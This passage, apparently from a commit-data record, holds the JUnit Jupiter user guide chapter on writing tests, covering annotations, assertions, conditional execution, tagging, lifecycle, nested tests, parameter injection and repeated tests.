table.\n","repos":"sbrannen\/junit-lambda,junit-team\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/writing-tests.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/writing-tests.adoc","new_contents":"[[writing-tests]]\n== Writing Tests\n\n[source,java,indent=0]\n.A first test case\n----\ninclude::{testDir}\/example\/MyFirstJUnitJupiterTests.java[tags=user_guide]\n----\n\n[[writing-tests-annotations]]\n=== Annotations\n\nJUnit Jupiter supports the following annotations for configuring tests and extending the\nframework.\n\nAll core annotations are located in the `{api-package}` package in the `junit-jupiter-api`\nmodule.\n\n[cols=\"20,80\"]\n|===\n| Annotation | Description\n\n| `@Test` | Denotes that a method is a test method. Unlike JUnit 4's `@Test` annotation, this annotation does not declare any attributes, since test extensions in JUnit Jupiter operate based on their own dedicated annotations. Such methods are _inherited_ unless they are _overridden_.\n| `@ParameterizedTest` | Denotes that a method is a <<writing-tests-parameterized-tests, parameterized test>>. Such methods are _inherited_ unless they are _overridden_.\n| `@RepeatedTest` | Denotes that a method is a test template for a <<writing-tests-repeated-tests, repeated test>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestFactory` | Denotes that a method is a test factory for <<writing-tests-dynamic-tests, dynamic tests>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestTemplate` | Denotes that a method is a <<writing-tests-test-templates, template for test cases>> designed to be invoked multiple times depending on the number of invocation contexts returned by the registered <<extensions-test-templates, providers>>. Such methods are _inherited_ unless they are _overridden_.\n| `@TestMethodOrder` | Used to configure the <<writing-tests-test-execution-order, test method execution order>> for the annotated test class; similar to JUnit 4's `@FixMethodOrder`. Such annotations are _inherited_.\n| `@TestInstance` | Used to configure the <<writing-tests-test-instance-lifecycle, test instance lifecycle>> for the annotated test class. Such annotations are _inherited_.\n| `@DisplayName` | Declares a custom <<writing-tests-display-names,display name>> for the test class or test method. Such annotations are not _inherited_.\n| `@DisplayNameGeneration` | Declares a custom <<writing-tests-display-name-generator,display name generator>> for the test class. Such annotations are _inherited_.\n| `@BeforeEach` | Denotes that the annotated method should be executed _before_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@Before`. Such methods are _inherited_ unless they are _overridden_.\n| `@AfterEach` | Denotes that the annotated method should be executed _after_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@After`. Such methods are _inherited_ unless they are _overridden_.\n| `@BeforeAll` | Denotes that the annotated method should be executed _before_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@BeforeClass`. Such methods are _inherited_ (unless they are _hidden_ or _overridden_) and must be `static` (unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used).\n| `@AfterAll` | Denotes that the annotated method should be executed _after_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@AfterClass`. Such methods are _inherited_ (unless they are _hidden_ or _overridden_) and must be `static` (unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used).\n| `@Nested` | Denotes that the annotated class is a non-static <<writing-tests-nested,nested test class>>. `@BeforeAll` and `@AfterAll` methods cannot be used directly in a `@Nested` test class unless the \"per-class\" <<writing-tests-test-instance-lifecycle, test instance lifecycle>> is used. Such annotations are not _inherited_.\n| `@Tag` | Used to declare <<writing-tests-tagging-and-filtering,tags for filtering tests>>, either at the class or method level; analogous to test groups in TestNG or Categories in JUnit 4. Such annotations are _inherited_ at the class level but not at the method level.\n| `@Disabled` | Used to <<writing-tests-disabling,disable>> a test class or test method; analogous to JUnit 4's `@Ignore`. Such annotations are not _inherited_.\n| `@ExtendWith` | Used to <<extensions-registration-declarative,register extensions declaratively>>. Such annotations are _inherited_.\n| `@RegisterExtension` | Used to <<extensions-registration-programmatic,register extensions programmatically>> via fields. Such fields are _inherited_ unless they are _shadowed_.\n|===\n\nAny method annotated with `@Test`, `@TestTemplate`, `@RepeatedTest`, `@ParameterizedTest`,\n`@BeforeAll`, `@AfterAll`, `@BeforeEach`, or `@AfterEach` must not return a value.\n\nWARNING: Some annotations may currently be _experimental_. Consult the table in\n<<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-meta-annotations]]\n==== Meta-Annotations and Composed Annotations\n\nJUnit Jupiter annotations can be used as _meta-annotations_. That means that you can\ndefine your own _composed annotation_ that will automatically _inherit_ the semantics of\nits meta-annotations.\n\nFor example, instead of copying and pasting `@Tag(\"fast\")` throughout your code base (see\n<<writing-tests-tagging-and-filtering>>), you can create a custom _composed annotation_\nnamed `@Fast` as follows. `@Fast` can then be used as a drop-in replacement for\n`@Tag(\"fast\")`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/Fast.java[tags=user_guide]\n----\n\n[[writing-tests-classes-and-methods]]\n=== Test Classes and Methods\n\nA _test method_ is any instance method that is directly annotated or meta-annotated with\n`@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`, or `@TestTemplate`. A\n_test class_ is any top-level or `static` member class that contains at least one _test\nmethod_.\n\n[source,java,indent=0]\n.A standard test class\n----\ninclude::{testDir}\/example\/StandardTests.java[tags=user_guide]\n----\n\nNOTE: Test classes and test methods are not required to be `public`, but they must _not_\nbe `private`.\n\n[[writing-tests-display-names]]\n=== Display Names\n\nTest classes and test methods can declare custom display names -- with spaces, special\ncharacters, and even emojis -- that will be displayed by test runners and test reporting.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisplayNameDemo.java[tags=user_guide]\n----\n\n[[writing-tests-display-name-generator]]\n==== Display Name Generators\n\nJUnit Jupiter supports custom display name generators that can be configured via the\n`@DisplayNameGeneration` annotation. Values provided via `@DisplayName` annotations\nalways take precedence over display names generated by a `DisplayNameGenerator`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisplayNameGeneratorDemo.java[tags=user_guide]\n----\n\n```\n+-- DisplayNameGeneratorDemo [OK]\n +-- A year is not supported [OK]\n | +-- A negative value for year is not supported by the leap year computation. [OK]\n | | +-- For example, year -1 is not supported. [OK]\n | | '-- For example, year -4 is not supported. [OK]\n | '-- if it is zero() [OK]\n '-- A year is a leap year... [OK]\n +-- A year is a leap year if it is divisible by 4 but not by 100. [OK]\n '-- A year is a leap year if it is one of the following years. [OK]\n +-- Year 2016 is a leap year. [OK]\n +-- Year 2020 is a leap year. [OK]\n '-- Year 2048 is a leap year. [OK]\n```\n\n[[writing-tests-assertions]]\n=== Assertions\n\nJUnit Jupiter comes with many of the assertion methods that JUnit 4 has and adds a few\nthat lend themselves well to being used with Java 8 lambdas. All JUnit Jupiter assertions\nare `static` methods in the `{Assertions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssertionsDemo.java[tags=user_guide]\n----\n\nJUnit Jupiter also comes with a few assertion methods that lend themselves well to being\nused in https:\/\/kotlinlang.org\/[Kotlin]. All JUnit Jupiter Kotlin assertions are top-level\nfunctions in the `org.junit.jupiter.api` package.\n\n\/\/ TODO: Change to using kotlin language highlighting after switch to rouge syntax highlighter\n[source,groovy,indent=0]\n----\ninclude::{kotlinTestDir}\/example\/AssertionsKotlinDemo.kt[tags=user_guide]\n----\n\n[[writing-tests-assertions-third-party]]\n==== Third-party Assertion Libraries\n\nEven though the assertion facilities provided by JUnit Jupiter are sufficient for many\ntesting scenarios, there are times when more power and additional functionality such as\n_matchers_ are desired or required. In such cases, the JUnit team recommends the use of\nthird-party assertion libraries such as {AssertJ}, {Hamcrest}, {Truth}, etc. Developers\nare therefore free to use the assertion library of their choice.\n\nFor example, the combination of _matchers_ and a fluent API can be used to make\nassertions more descriptive and readable. However, JUnit Jupiter's `{Assertions}` class\ndoes not provide an\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/junit\/Assert.html#assertThat[`assertThat()`]\nmethod like the one found in JUnit 4's `org.junit.Assert` class which accepts a Hamcrest\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/hamcrest\/Matcher.html[`Matcher`]. Instead,\ndevelopers are encouraged to use the built-in support for matchers provided by third-party\nassertion libraries.\n\nThe following example demonstrates how to use the `assertThat()` support from Hamcrest in\na JUnit Jupiter test. As long as the Hamcrest library has been added to the classpath,\nyou can statically import methods such as `assertThat()`, `is()`, and `equalTo()` and\nthen use them in tests like in the `assertWithHamcrestMatcher()` method below.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/HamcrestAssertionDemo.java[tags=user_guide]\n----\n\nNaturally, legacy tests based on the JUnit 4 programming model can continue using\n`org.junit.Assert#assertThat`.\n\n[[writing-tests-assumptions]]\n=== Assumptions\n\nJUnit Jupiter comes with a subset of the assumption methods that JUnit 4 provides and\nadds a few that lend themselves well to being used with Java 8 lambda expressions and\nmethod references. All JUnit Jupiter assumptions are static methods in the\n`{Assumptions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssumptionsDemo.java[tags=user_guide]\n----\n\nNOTE: As of JUnit Jupiter 5.4, it is also possible to use methods from JUnit 4's\n`org.junit.Assume` class for assumptions. Specifically, JUnit Jupiter supports JUnit 4's\n`AssumptionViolatedException` to signal that a test should be aborted instead of marked\nas a failure.\n\n[[writing-tests-disabling]]\n=== Disabling Tests\n\nEntire test classes or individual test methods may be _disabled_ via the `{Disabled}`\nannotation, via one of the annotations discussed in\n<<writing-tests-conditional-execution>>, or via a custom <<extensions-conditions,\n`ExecutionCondition`>>.\n\nHere's a `@Disabled` test class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledClassDemo.java[tags=user_guide]\n----\n\nAnd here's a test class that contains a `@Disabled` test method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledTestsDemo.java[tags=user_guide]\n----\n\nNOTE: `@Disabled` may be declared without providing a _reason_; however, the JUnit team\nrecommends that developers provide a short explanation for why a test class or test\nmethod has been disabled. Consequently, the above examples both show the use of a reason\n-- for example, `@Disabled(\"Disabled until bug #42 has been resolved\")`. Some development\nteams even require the presence of issue tracking numbers in the _reason_ for automated\ntraceability, etc.\n\n[[writing-tests-conditional-execution]]\n=== Conditional Test Execution\n\nThe <<extensions-conditions, `ExecutionCondition`>> extension API in JUnit Jupiter allows\ndevelopers to either _enable_ or _disable_ a container or test based on certain\nconditions _programmatically_. The simplest example of such a condition is the built-in\n`{DisabledCondition}` which supports the `{Disabled}` annotation (see\n<<writing-tests-disabling>>). In addition to `@Disabled`, JUnit Jupiter also supports\nseveral other annotation-based conditions in the `org.junit.jupiter.api.condition`\npackage that allow developers to enable or disable containers and tests _declaratively_.\nSee the following sections for details.\n\n[TIP]\n.Composed Annotations\n====\nNote that any of the _conditional_ annotations listed in the following sections may also\nbe used as a meta-annotation in order to create a custom _composed annotation_. For\nexample, the `@TestOnMac` annotation in the\n<<writing-tests-conditional-execution-os-demo, @EnabledOnOs demo>> shows how you can\ncombine `@Test` and `@EnabledOnOs` in a single, reusable annotation.\n====\n\n[WARNING]\n====\nEach of the _conditional_ annotations listed in the following sections can only be\ndeclared once on a given test interface, test class, or test method. If a conditional\nannotation is directly present, indirectly present, or meta-present multiple times on a\ngiven element, only the first such annotation discovered by JUnit will be used; any\nadditional declarations will be silently ignored. Note, however, that each conditional\nannotation may be used in conjunction with other conditional annotations in the\n`org.junit.jupiter.api.condition` package.\n====\n\n[[writing-tests-conditional-execution-os]]\n==== Operating System Conditions\n\nA container or test may be enabled or disabled on a particular operating system via the\n`{EnabledOnOs}` and `{DisabledOnOs}` annotations.\n\n[[writing-tests-conditional-execution-os-demo]]\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_os]\n----\n\n[[writing-tests-conditional-execution-jre]]\n==== Java Runtime Environment Conditions\n\nA container or test may be enabled or disabled on a particular version of the Java\nRuntime Environment (JRE) via the `{EnabledOnJre}` and `{DisabledOnJre}` annotations.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_jre]\n----\n\n[[writing-tests-conditional-execution-system-properties]]\n==== System Property Conditions\n\nA container or test may be enabled or disabled based on the value of the `named` JVM\nsystem property via the `{EnabledIfSystemProperty}` and `{DisabledIfSystemProperty}`\nannotations. The value supplied via the `matches` attribute will be interpreted as a\nregular expression.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_system_property]\n----\n\n[[writing-tests-conditional-execution-environment-variables]]\n==== Environment Variable Conditions\n\nA container or test may be enabled or disabled based on the value of the `named`\nenvironment variable from the underlying operating system via the\n`{EnabledIfEnvironmentVariable}` and `{DisabledIfEnvironmentVariable}` annotations. The\nvalue supplied via the `matches` attribute will be interpreted as a regular expression.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_environment_variable]\n----\n\n[[writing-tests-conditional-execution-scripts]]\n==== Script-based Conditions\n\nJUnit Jupiter provides the ability to either _enable_ or _disable_ a container or test\ndepending on the evaluation of a script configured via the `{EnabledIf}` or\n`{DisabledIf}` annotation. Scripts can be written in JavaScript, Groovy, or any other\nscripting language for which there is support for the Java Scripting API, defined by JSR\n223.\n\nWARNING: Conditional test execution via `{EnabledIf}` and `{DisabledIf}` is currently an\n_experimental_ feature. Consult the table in <<api-evolution-experimental-apis>> for\ndetails.\n\nTIP: If the logic of your script depends only on the current operating system, the\ncurrent Java Runtime Environment version, a particular JVM system property, or a\nparticular environment variable, you should consider using one of the built-in\nannotations dedicated to that purpose. See the previous sections of this chapter for\nfurther details.\n\nNOTE: If you find yourself using the same script-based condition many times, consider\nwriting a dedicated <<extensions-conditions, ExecutionCondition>> extension in order to\nimplement the condition in a faster, type-safe, and more maintainable manner.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ConditionalTestExecutionDemo.java[tags=user_guide_scripts]\n----\n\n[[writing-tests-conditional-execution-scripts-bindings]]\n===== Script Bindings\n\nThe following names are bound to each script context and therefore usable within the\nscript. An _accessor_ provides access to a map-like structure via a simple `String\nget(String name)` method.\n\n[cols=\"25,25,75\"]\n|===\n| Name | Type | Description\n\n| `systemEnvironment` | _accessor_ | Operating system environment variable accessor.\n| `systemProperty` | _accessor_ | JVM system property accessor.\n| `junitConfigurationParameter` | _accessor_ | Configuration parameter accessor.\n| `junitDisplayName` | `String` | Display name of the test or container.\n| `junitTags` | `Set<String>` | All tags assigned to the test or container.\n| `junitUniqueId` | `String` | Unique ID of the test or container.\n|===\n\n\n[[writing-tests-tagging-and-filtering]]\n=== Tagging and Filtering\n\nTest classes and methods can be tagged via the `@Tag` annotation. Those tags can later be\nused to filter <<running-tests,test discovery and execution>>.\n\n==== Syntax Rules for Tags\n\n* A tag must not be `null` or _blank_.\n* A _trimmed_ tag must not contain whitespace.\n* A _trimmed_ tag must not contain ISO control characters.\n* A _trimmed_ tag must not contain any of the following _reserved characters_.\n - `,`: _comma_\n - `(`: _left parenthesis_\n - `)`: _right parenthesis_\n - `&`: _ampersand_\n - `|`: _vertical bar_\n - `!`: _exclamation point_\n\nNOTE: In the above context, \"trimmed\" means that leading and trailing whitespace\ncharacters have been removed.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TaggingDemo.java[tags=user_guide]\n----\n\n[[writing-tests-test-execution-order]]\n=== Test Execution Order\n\nBy default, test methods will be ordered using a default algorithm that is deterministic\nbut intentionally nonobvious. This ensures that subsequent runs of a test suite execute\ntest methods in the same order, thereby allowing for repeatable builds.\n\nNOTE: In this context, a _test method_ is any instance method that is directly or\nmeta-annotated with `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`, or\n`@TestTemplate`.\n\nAlthough true _unit tests_ typically should not rely on the order in which they are\nexecuted, there are times when it is necessary to enforce a specific test method\nexecution order -- for example, when writing _integration tests_ or _functional tests_\nwhere the sequence of the tests is important, especially in conjunction\n`@TestInstance(Lifecycle.PER_CLASS)`.\n\nTo control the order in which test methods are executed, annotate your test class or test\ninterface with `{TestMethodOrder}` and specify the desired `{MethodOrderer}`\nimplementation. You can implement your own custom `MethodOrderer` or use one of the\nfollowing built-in `MethodOrderer` implementations.\n\n* `{Alphanumeric}`: sorts test methods _alphanumerically_ based on their names and formal\n parameter lists.\n* `{OrderAnnotation}`: sorts test methods _numerically_ based on values specified via the\n `{Order}` annotation.\n* `{Random}`: orders test methods _pseudo-randomly_ and supports configuration of a\n custom _seed_.\n\nThe following example demonstrates how to guarantee that test methods are executed in the\norder specified via the `@Order` annotation.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/OrderedTestsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-test-instance-lifecycle]]\n=== Test Instance Lifecycle\n\nIn order to allow individual test methods to be executed in isolation and to avoid\nunexpected side effects due to mutable test instance state, JUnit creates a new instance\nof each test class before executing each _test method_ (see\n<<writing-tests-classes-and-methods>>). This \"per-method\" test instance lifecycle is the\ndefault behavior in JUnit Jupiter and is analogous to all previous versions of JUnit.\n\nNOTE: Please note that the test class will still be instantiated if a given _test method_\nis _disabled_ via a <<writing-tests-conditional-execution,condition>> (e.g., `@Disabled`,\n`@DisabledOnOs`, etc.) even when the \"per-method\" test instance lifecycle mode is active.\n\nIf you would prefer that JUnit Jupiter execute all test methods on the same test\ninstance, annotate your test class with `@TestInstance(Lifecycle.PER_CLASS)`. When using\nthis mode, a new test instance will be created once per test class. Thus, if your test\nmethods rely on state stored in instance variables, you may need to reset that state in\n`@BeforeEach` or `@AfterEach` methods.\n\nThe \"per-class\" mode has some additional benefits over the default \"per-method\" mode.\nSpecifically, with the \"per-class\" mode it becomes possible to declare `@BeforeAll` and\n`@AfterAll` on non-static methods as well as on interface `default` methods. The\n\"per-class\" mode therefore also makes it possible to use `@BeforeAll` and `@AfterAll`\nmethods in `@Nested` test classes.\n\nIf you are authoring tests using the Kotlin programming language, you may also find it\neasier to implement `@BeforeAll` and `@AfterAll` methods by switching to the \"per-class\"\ntest instance lifecycle mode.\n\n[[writing-tests-test-instance-lifecycle-changing-default]]\n==== Changing the Default Test Instance Lifecycle\n\nIf a test class or test interface is not annotated with `@TestInstance`, JUnit Jupiter\nwill use a _default_ lifecycle mode. The standard _default_ mode is `PER_METHOD`;\nhowever, it is possible to change the _default_ for the execution of an entire test plan.\nTo change the default test instance lifecycle mode, set the\n`junit.jupiter.testinstance.lifecycle.default` _configuration parameter_ to the name of\nan enum constant defined in `TestInstance.Lifecycle`, ignoring case. This can be supplied\nas a JVM system property, as a _configuration parameter_ in the\n`LauncherDiscoveryRequest` that is passed to the `Launcher`, or via the JUnit Platform\nconfiguration file (see <<running-tests-config-params>> for details).\n\nFor example, to set the default test instance lifecycle mode to `Lifecycle.PER_CLASS`,\nyou can start your JVM with the following system property.\n\n`-Djunit.jupiter.testinstance.lifecycle.default=per_class`\n\nNote, however, that setting the default test instance lifecycle mode via the JUnit\nPlatform configuration file is a more robust solution since the configuration file can be\nchecked into a version control system along with your project and can therefore be used\nwithin IDEs and your build software.\n\nTo set the default test instance lifecycle mode to `Lifecycle.PER_CLASS` via the JUnit\nPlatform configuration file, create a file named `junit-platform.properties` in the root\nof the class path (e.g., `src\/test\/resources`) with the following content.\n\n`junit.jupiter.testinstance.lifecycle.default = per_class`\n\nWARNING: Changing the _default_ test instance lifecycle mode can lead to unpredictable\nresults and fragile builds if not applied consistently. For example, if the build\nconfigures \"per-class\" semantics as the default but tests in the IDE are executed using\n\"per-method\" semantics, that can make it difficult to debug errors that occur on the\nbuild server. It is therefore recommended to change the default in the JUnit Platform\nconfiguration file instead of via a JVM system property.\n\n[[writing-tests-nested]]\n=== Nested Tests\n\nNested tests give the test writer more capabilities to express the relationship among\nseveral group of tests. Here's an elaborate example.\n\n[source,java,indent=0]\n.Nested test suite for testing a stack\n----\ninclude::{testDir}\/example\/TestingAStackDemo.java[tags=user_guide]\n----\n\nNOTE: _Only non-static nested classes_ (i.e. _inner classes_) can serve as `@Nested` test\nclasses. Nesting can be arbitrarily deep, and those inner classes are considered to be\nfull members of the test class family with one exception: `@BeforeAll` and `@AfterAll`\nmethods do not work _by default_. The reason is that Java does not allow `static` members\nin inner classes. However, this restriction can be circumvented by annotating a `@Nested`\ntest class with `@TestInstance(Lifecycle.PER_CLASS)` (see\n<<writing-tests-test-instance-lifecycle>>).\n\n[[writing-tests-dependency-injection]]\n=== Dependency Injection for Constructors and Methods\n\nIn all prior JUnit versions, test constructors or methods were not allowed to have\nparameters (at least not with the standard `Runner` implementations). As one of the major\nchanges in JUnit Jupiter, both test constructors and methods are now permitted to have\nparameters. This allows for greater flexibility and enables _Dependency Injection_ for\nconstructors and methods.\n\n`{ParameterResolver}` defines the API for test extensions that wish to _dynamically_\nresolve parameters at runtime. If a test constructor or a `@Test`, `@TestFactory`,\n`@BeforeEach`, `@AfterEach`, `@BeforeAll`, or `@AfterAll` method accepts a parameter, the\nparameter must be resolved at runtime by a registered `ParameterResolver`.\n\nThere are currently three built-in resolvers that are registered automatically.\n\n* `{TestInfoParameterResolver}`: if a method parameter is of type `{TestInfo}`, the\n `TestInfoParameterResolver` will supply an instance of `TestInfo` corresponding to the\n current test as the value for the parameter. The `TestInfo` can then be used to retrieve\n information about the current test such as the test's display name, the test class, the\n test method, or associated tags. The display name is either a technical name, such as\n the name of the test class or test method, or a custom name configured via `@DisplayName`.\n+\n`{TestInfo}` acts as a drop-in replacement for the `TestName` rule from JUnit 4. The\nfollowing demonstrates how to have `TestInfo` injected into a test constructor,\n`@BeforeEach` method, and `@Test` method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestInfoDemo.java[tags=user_guide]\n----\n\n* `{RepetitionInfoParameterResolver}`: if a method parameter in a `@RepeatedTest`,\n `@BeforeEach`, or `@AfterEach` method is of type `{RepetitionInfo}`, the\n `RepetitionInfoParameterResolver` will supply an instance of `RepetitionInfo`.\n `RepetitionInfo` can then be used to retrieve information about the current repetition\n and the total number of repetitions for the corresponding `@RepeatedTest`. Note,\n however, that `RepetitionInfoParameterResolver` is not registered outside the context\n of a `@RepeatedTest`. See <<writing-tests-repeated-tests-examples>>.\n\n* `{TestReporterParameterResolver}`: if a method parameter is of type `{TestReporter}`,\n the `TestReporterParameterResolver` will supply an instance of `TestReporter`. The\n `TestReporter` can be used to publish additional data about the current test run. The\n data can be consumed through `{TestExecutionListener}.reportingEntryPublished()` and\n thus be viewed by IDEs or included in reports.\n+\nIn JUnit Jupiter you should use `TestReporter` where you used to print information to\n`stdout` or `stderr` in JUnit 4. Using `@RunWith(JUnitPlatform.class)` will even output\nall reported entries to `stdout`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestReporterDemo.java[tags=user_guide]\n----\n\nNOTE: Other parameter resolvers must be explicitly enabled by registering appropriate\n<<extensions,extensions>> via `@ExtendWith`.\n\nCheck out the `{RandomParametersExtension}` for an example of a custom\n`{ParameterResolver}`. While not intended to be production-ready, it demonstrates the\nsimplicity and expressiveness of both the extension model and the parameter resolution\nprocess. `MyRandomParametersTest` demonstrates how to inject random values into `@Test`\nmethods.\n\n[source,java,indent=0]\n----\n@ExtendWith(RandomParametersExtension.class)\nclass MyRandomParametersTest {\n\n\t@Test\n\tvoid injectsInteger(@Random int i, @Random int j) {\n\t\tassertNotEquals(i, j);\n\t}\n\n\t@Test\n\tvoid injectsDouble(@Random double d) {\n\t\tassertEquals(0.0, d, 1.0);\n\t}\n\n}\n----\n\nFor real-world use cases, check out the source code for the `{MockitoExtension}` and the\n`{SpringExtension}`.\n\n[[writing-tests-test-interfaces-and-default-methods]]\n=== Test Interfaces and Default Methods\n\nJUnit Jupiter allows `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`,\n`@TestTemplate`, `@BeforeEach`, and `@AfterEach` to be declared on interface `default`\nmethods. `@BeforeAll` and `@AfterAll` can either be declared on `static` methods in a\ntest interface or on interface `default` methods _if_ the test interface or test class is\nannotated with `@TestInstance(Lifecycle.PER_CLASS)` (see\n<<writing-tests-test-instance-lifecycle>>). Here are some examples.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestLifecycleLogger.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDynamicTestsDemo.java[tags=user_guide]\n----\n\n`@ExtendWith` and `@Tag` can be declared on a test interface so that classes that\nimplement the interface automatically inherit its tags and extensions. See\n<<extensions-lifecycle-callbacks-before-after-execution>> for the source code of the\n<<extensions-lifecycle-callbacks-timing-extension, TimingExtension>>.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TimeExecutionLogger.java[tags=user_guide]\n----\n\nIn your test class you can then implement these test interfaces to have them applied.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDemo.java[tags=user_guide]\n----\n\nRunning the `TestInterfaceDemo` results in output similar to the following:\n\n....\nINFO example.TestLifecycleLogger - Before all tests\nINFO example.TestLifecycleLogger - About to execute [dynamicTestsForPalindromes()]\nINFO example.TimingExtension - Method [dynamicTestsForPalindromes] took 19 ms.\nINFO example.TestLifecycleLogger - Finished executing [dynamicTestsForPalindromes()]\nINFO example.TestLifecycleLogger - About to execute [isEqualValue()]\nINFO example.TimingExtension - Method [isEqualValue] took 1 ms.\nINFO example.TestLifecycleLogger - Finished executing [isEqualValue()]\nINFO example.TestLifecycleLogger - After all tests\n....\n\nAnother possible application of this feature is to write tests for interface contracts.\nFor example, you can write tests for how implementations of `Object.equals` or\n`Comparable.compareTo` should behave as follows.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/Testable.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/EqualsContract.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/ComparableContract.java[tags=user_guide]\n----\n\nIn your test class you can then implement both contract interfaces thereby inheriting the\ncorresponding tests. Of course you'll have to implement the abstract methods.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/StringTests.java[tags=user_guide]\n----\n\nNOTE: The above tests are merely meant as examples and therefore not complete.\n\n\n[[writing-tests-repeated-tests]]\n=== Repeated Tests\n\nJUnit Jupiter provides the ability to repeat a test a specified number of times by\nannotating a method with `@RepeatedTest` and specifying the total number of repetitions\ndesired. Each invocation of a repeated test behaves like the execution of a regular\n`@Test` method with full support for the same lifecycle callbacks and extensions.\n\nThe following example demonstrates how to declare a test named `repeatedTest()` that\nwill be automatically repeated 10 times.\n\n[source,java]\n----\n@RepeatedTest(10)\nvoid repeatedTest() {\n\t\/\/ ...\n}\n----\n\nIn addition to specifying the number of repetitions, a custom display name can be\nconfigured for each repetition via the `name` attribute of the `@RepeatedTest`\nannotation. Furthermore, the display name can be a pattern composed of a combination of\nstatic text and dynamic placeholders. The following placeholders are currently supported.\n\n- `{displayName}`: display name of the `@RepeatedTest` method\n- `{currentRepetition}`: the current repetition count\n- `{totalRepetitions}`: the total number of repetitions\n\nThe default display name for a given repetition is generated based on the following\npattern: `\"repetition {currentRepetition} of {totalRepetitions}\"`. Thus, the display\nnames for individual repetitions of the previous `repeatedTest()` example would be:\n`repetition 1 of 10`, `repetition 2 of 10`, etc. If you would like the display name of\nthe `@RepeatedTest` method included in the name of each repetition, you can define your\nown custom pattern or use the predefined `RepeatedTest.LONG_DISPLAY_NAME` pattern. The\nlatter is equal to `\"{displayName} :: repetition {currentRepetition} of\n{totalRepetitions}\"` which results in display names for individual repetitions like\n`repeatedTest() :: repetition 1 of 10`, `repeatedTest() :: repetition 2 of 10`, etc.\n\nIn order to retrieve information about the current repetition and the total number of\nrepetitions programmatically, a developer can choose to have an instance of\n`RepetitionInfo` injected into a `@RepeatedTest`, `@BeforeEach`, or `@AfterEach` method.\n\n[[writing-tests-repeated-tests-examples]]\n==== Repeated Test Examples\n\nThe `RepeatedTestsDemo` class at the end of this section demonstrates several examples of\nrepeated tests.\n\nThe `repeatedTest()` method is identical to example from the previous section; whereas,\n`repeatedTestWithRepetitionInfo()` demonstrates how to have an instance of\n`RepetitionInfo` injected into a test to access the total number of repetitions for the\ncurrent repeated test.\n\nThe next two methods demonstrate how to include a custom `@DisplayName` for the\n`@RepeatedTest` method in the display name of each repetition. `customDisplayName()`\ncombines a custom display name with a custom pattern and then uses `TestInfo` to verify\nthe format of the generated display name. `Repeat!` is the `{displayName}` which comes\nfrom the `@DisplayName` declaration, and `1\/1` comes from\n`{currentRepetition}\/{totalRepetitions}`. In contrast,\n`customDisplayNameWithLongPattern()` uses the aforementioned predefined\n`RepeatedTest.LONG_DISPLAY_NAME` pattern.\n\n`repeatedTestInGerman()` demonstrates the ability to translate display names of repeated\ntests into foreign languages -- in this case German, resulting in names for individual\nrepetitions such as: `Wiederholung 1 von 5`, `Wiederholung 2 von 5`, etc.\n\nSince the `beforeEach()` method is annotated with `@BeforeEach` it will get executed\nbefore each repetition of each repeated test. By having the `TestInfo` and\n`RepetitionInfo` injected into the method, we see that it's possible to obtain\ninformation about the currently executing repeated test. Executing `RepeatedTestsDemo`\nwith the `INFO` log level enabled results in the following output.\n\n....\nINFO: About to execute repetition 1 of 10 for repeatedTest\nINFO: About to execute repetition 2 of 10 for repeatedTest\nINFO: About to execute repetition 3 of 10 for repeatedTest\nINFO: About to execute repetition 4 of 10 for repeatedTest\nINFO: About to execute repetition 5 of 10 for repeatedTest\nINFO: About to execute repetition 6 of 10 for repeatedTest\nINFO: About to execute repetition 7 of 10 for repeatedTest\nINFO: About to execute repetition 